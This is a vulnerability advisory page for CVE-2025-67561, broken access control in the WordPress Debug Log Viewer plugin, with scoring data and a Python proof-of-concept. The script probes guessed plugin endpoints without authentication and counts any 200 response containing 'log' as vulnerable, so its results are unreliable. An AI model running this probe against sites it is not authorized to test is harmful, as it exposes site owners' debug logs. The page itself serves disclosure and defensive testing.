Security Vulnerability Report
中文
CVE-2025-67561 CVSS 5.4 MEDIUM

CVE-2025-67561

Published: 2025-12-09 16:18:33
Last Modified: 2026-04-27 18:16:43

Description

Missing Authorization vulnerability in Oleksandr Lysyi Debug Log Viewer debug-log-viewer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Debug Log Viewer: from n/a through <= 2.0.3.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

debug-log-viewer <= 2.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67561 PoC - WordPress Debug Log Viewer Broken Access Control # Target: WordPress site with debug-log-viewer plugin <= 2.0.3 def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-67561 """ # Common endpoints for Debug Log Viewer plugin endpoints = [ '/wp-admin/admin-ajax.php?action=debug_log_viewer', '/wp-admin/tools.php?page=debug-log-viewer', '/wp-content/plugins/debug-log-viewer/includes/view-log.php', '/?rest_route=/debug-log-viewer/v1/view' ] print(f'[*] Testing target: {target_url}') # Try to access without proper authorization for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200 and ('debug' in response.text.lower() or 'log' in response.text.lower()): print(f'[+] Potential vulnerability found at: {url}') print(f'[+] Response length: {len(response.text)} bytes') return True except requests.RequestException as e: print(f'[-] Error accessing {url}: {e}') return False def main(): if len(sys.argv) < 2: print('Usage: python cve-2025-67561.py <target_url>') print('Example: python cve-2025-67561.py http://example.com') sys.exit(1) target = sys.argv[1] if check_vulnerability(target): print('\n[!] Target appears to be vulnerable to CVE-2025-67561') print('[!] Recommendation: Update debug-log-viewer plugin to version > 2.0.3') else: print('\n[-] Target does not appear to be vulnerable or plugin not found') if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67561", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:32.557", "lastModified": "2026-04-27T18:16:43.317", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Oleksandr Lysyi Debug Log Viewer debug-log-viewer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Debug Log Viewer: from n/a through <= 2.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/debug-log-viewer/vulnerability/wordpress-debug-log-viewer-plugin-2-0-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}